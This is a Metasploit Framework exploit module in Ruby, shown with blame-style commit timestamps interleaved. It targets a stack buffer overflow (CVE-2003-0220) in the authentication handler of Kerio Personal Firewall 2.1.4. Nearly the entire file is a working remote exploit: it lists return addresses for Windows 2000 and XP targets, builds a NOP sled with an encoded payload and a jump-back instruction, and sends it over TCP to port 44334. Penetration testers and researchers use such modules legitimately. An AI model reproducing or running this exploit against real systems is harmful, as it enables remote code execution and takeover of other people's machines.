2007-02-18 00:10:39 +00:00
|
|
|
##
|
2008-10-02 05:23:59 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2006-09-13 06:20:05 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = AverageRanking
|
2006-09-13 06:20:05 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2006-09-13 06:20:05 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
|
|
|
|
'Description' => %q{
|
2010-05-09 17:45:00 +00:00
|
|
|
This module exploits a stack buffer overflow in Kerio Personal Firewall
|
2010-04-30 08:40:19 +00:00
|
|
|
administration authentication process. This module has only been tested
|
2006-09-13 06:20:05 +00:00
|
|
|
against Kerio Personal Firewall 2 (2.1.4).
|
|
|
|
},
|
|
|
|
'Author' => 'MC',
|
|
|
|
'License' => MSF_LICENSE,
|
2007-02-18 00:10:39 +00:00
|
|
|
'Version' => '$Revision$',
|
2010-04-30 08:40:19 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2006-09-13 06:20:05 +00:00
|
|
|
['CVE', '2003-0220'],
|
2009-09-12 04:22:58 +00:00
|
|
|
['OSVDB', '6294'],
|
|
|
|
['BID', '7180'],
|
2006-09-13 06:20:05 +00:00
|
|
|
['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
2006-09-24 17:49:46 +00:00
|
|
|
'Space' => 800,
|
2006-09-13 06:20:05 +00:00
|
|
|
'BadChars' => "\x00",
|
2006-09-24 17:49:46 +00:00
|
|
|
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
|
2006-09-13 06:20:05 +00:00
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
|
|
|
|
[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],
|
2010-04-30 08:40:19 +00:00
|
|
|
[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],
|
2006-09-13 06:20:05 +00:00
|
|
|
],
|
|
|
|
'Privileged' => true,
|
2010-06-15 07:18:08 +00:00
|
|
|
'DisclosureDate' => 'Apr 28 2003',
|
2006-09-13 06:20:05 +00:00
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(44334)
|
|
|
|
], self.class)
|
2006-09-13 06:20:05 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
connect
|
|
|
|
|
|
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
|
2006-09-24 17:49:46 +00:00
|
|
|
sploit = make_nops(4468) + payload.encoded
|
|
|
|
sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')
|
2006-09-13 06:20:05 +00:00
|
|
|
|
|
|
|
sock.put(sploit)
|
|
|
|
sock.get_once(-1, 3)
|
2006-09-24 17:49:46 +00:00
|
|
|
|
2006-09-13 06:20:05 +00:00
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
2009-09-12 04:22:58 +00:00
|
|
|
end
|